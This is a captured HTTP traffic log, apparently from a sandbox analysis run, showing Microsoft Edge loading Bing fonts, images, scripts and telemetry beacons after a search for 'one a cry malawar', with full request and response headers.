accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-sHgI2KF5qU4AQ3xCUQckckSpf+W62hm+BtSCl7vQoVg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 17 Oct 2024 21:03:44 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199024.1491007b
GET

https://www.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

content-length: 15436
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-M0xpQtLzzJkj/4vNXa2c0aNVt1kgGjB4BwegH5PfntY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 17 Oct 2024 21:03:44 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199024.1491007c
GET

https://www.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

expires: Fri, 18 Oct 2024 05:34:06 GMT
last-modified: Tue, 24 Sep 2024 05:57:20 GMT
etag: 0x8DCDC5DC0B634E9
cache-control: public, no-transform, max-age=43761
akamai-amd-bc-debug: [a=92.123.132.92,b=3023998751,c=c,d=1729084387,h=304,k=1,l=1,n=GB_EN_LONDON,o=20940,r=2]
content-length: 10060
content-type: image/png
content-md5: NyL0K09FbOsKFVWkE+stgw==
x-ms-request-id: 8d818a43-101e-004a-1cc7-15daf7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:44 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199024.149100ee
GET

https://www.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

content-length: 4286
content-type: image/x-icon
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.149105cd
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 345
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

expires: Sat, 12 Oct 2024 09:48:27 GMT
last-modified: Tue, 24 Sep 2024 07:00:18 GMT
etag: 0x8DCDC668C8634C1
cache-control: public, no-transform, max-age=143637
content-type: text/javascript; charset=utf-8
content-md5: xjyqyLrD8Rh4DebSjkPaOg==
x-ms-request-id: d935d2dc-d01e-0013-1d9e-18df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-length: 19906
akamai-grn: 0.91901002.1728294659.81d2f377
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.149105ce
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:12,%22BC%22:515,%22SE%22:-1,%22TC%22:-1,%22H%22:659,%22BP%22:662,%22CT%22:669,%22IL%22:8},%22ad%22:[-1,-1,1263,601,1263,2230,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:12,%22BC%22:515,%22SE%22:-1,%22TC%22:-1,%22H%22:659,%22BP%22:662,%22CT%22:669,%22IL%22:8},%22ad%22:[-1,-1,1263,601,1263,2230,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.149105ae
GET

https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /sa/simg/favicon-trans-bg-blue-mg.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.149105af
GET

https://www.bing.com/rp/oocd_GLJp7OiNEvIPidegylCzYE.br.js

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/oocd_GLJp7OiNEvIPidegylCzYE.br.js HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

content-length: 1929
content-type: image/png
content-md5: TBVfy13T2kZEUa0kC23mBg==
last-modified: Tue, 24 Sep 2024 06:45:05 GMT
etag: 0x8DCDC646C9AF5F4
x-ms-request-id: 1d60634c-401e-0052-2736-1bf762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=431994
expires: Tue, 15 Oct 2024 17:05:14 GMT
akamai-grn: 0.a5777b5c.1728579920.132922b5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910839
GET

https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.0.0/js/widget.js?t=241017

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rewardsapp/widgetassets/prod/medallion/1.0.0/js/widget.js?t=241017 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=

Response

HTTP/2.0 200

content-type: application/json
access-control-allow-origin: *
cache-control: public, max-age=21600
content-encoding: br
last-modified: Thu, 26 Sep 2024 14:00:34 GMT
vary: Accept-Encoding
x-ms-request-id: c7a36b3c-001e-004a-6562-20c404000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20241017T070335Z-r1b467f6df9fxjx2ar7s3xh6sn00000009zg00000000crqz
x-fd-int-roxy-purgeid: 0
x-cache-info: L1_T2
x-ceto-ref: 6710b6c7c00f4d0ebbcd04f521c57c96|AFD:6710b6c7c00f4d0ebbcd04f521c57c96|2024-10-17T07:03:35.877Z
content-length: 48764
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910838
GET

https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
